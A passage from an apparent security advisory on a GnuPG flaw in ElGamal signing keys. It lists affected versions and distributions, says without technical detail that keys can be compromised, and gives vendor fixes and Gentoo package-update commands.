+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.0
GNU GNU Privacy Guard 1.0.6
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
GNU GNU Privacy Guard 1.0.5
- Caldera OpenLinux 2.4
- Caldera OpenLinux 2.3
- Caldera OpenLinux eBuilder 3.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- Immunix Immunix OS 7.0 beta
- Immunix Immunix OS 7.0
- Immunix Immunix OS 6.2
- MandrakeSoft Corporate Server 1.0.1
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Red Hat Linux 6.2
- RedHat Linux 7.1 i386
- RedHat Linux 7.1
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- Trustix Secure Linux 1.2
- Trustix Secure Linux 1.1
GNU GNU Privacy Guard 1.0.4
- Turbolinux Turbolinux 6.0.5
- Turbolinux Turbolinux Server 6.5
- Turbolinux Turbolinux Workstation 6.1
GNU GNU Privacy Guard 1.0.3 b
GNU GNU Privacy Guard 1.0.3
GNU GNU Privacy Guard 1.0.2

- Vulnerability discussion

GnuPG is prone to a vulnerability in the implementation of ElGamal signing keys that could compromise private keys. The vendor has stated that this vulnerability could be practically exploited to compromise private keys in seconds. This vulnerability was introduced as of version 1.0.2 of GnuPG.

- Exploit

The vendor has reported that there is a practical attack which will compromise private keys and all ElGamal signing keys that have been generated with vulnerable versions of the software should be considered compromised.

- Solution

Debian has released an updated advisory (DSA 429-2) and fixes to address this issue. Please see the referenced advisory for links to fixed packages.

Red Hat has released an advisory (RHSA-2003:390-01) that includes fixes for this issue. Please see the attached advisory for details on obtaining and applying fixes.

Conectiva has released an advisory that includes fixes for this issue.

Mandrake has released an advisory and fixes for this issue.

SuSE has released an advisory (SuSE-SA:2003:048) that includes fixes for this issue. Please see the attached advisory for details on obtaining and applying fixes.

The vendor has released a patch for this issue that can be applied to version 1.2.3. This fix will also be included in the next version.

Gentoo has released an advisory (200312-05) to address this issue. All Gentoo Linux systems should be updated to use gnupg-1.2.3-r5 or higher as follows:

emerge sync
emerge -pv '>=app-crypt/gnupg-1.2.3-r5'
emerge '>=app-crypt/gnupg-1.2.3-r5'
emerge clean

TurboLinux has released advisory TLSA-2003-68 and fixes to address this issue.

SGI advisory 20031203-01-U has been released to address this issue.

Debian has released an advisory (DSA 429-1) and fixes to address this issue. Please see the referenced advisory for links to fixed packages.

SGI has released an advisory 20040202-01-U to address this and other issues in SGI ProPack 2.4. Please see the referenced advisory for more information.

SCO has released advisory CSSA-2004-009.0 to address this issue.

Fixes are available below:


RedHat gnupg-1.0.7-6.i386.rpm

RedHat gnupg-1.2.1-3.i386.rpm

RedHat gnupg-1.0.6-3.ia64.rpm

RedHat gnupg-1.0.6-3.i386.rpm

RedHat gnupg-1.0.4-11.i386.rpm

RedHat gnupg-1.0.6-5.i386.rpm

GNU GNU Privacy Guard 1.0.7

GNU GNU Privacy Guard 1.2.2

GNU GNU Privacy Guard 1.2.2 -rc1

GNU GNU Privacy Guard 1.2.3

SGI ProPack 2.4

- References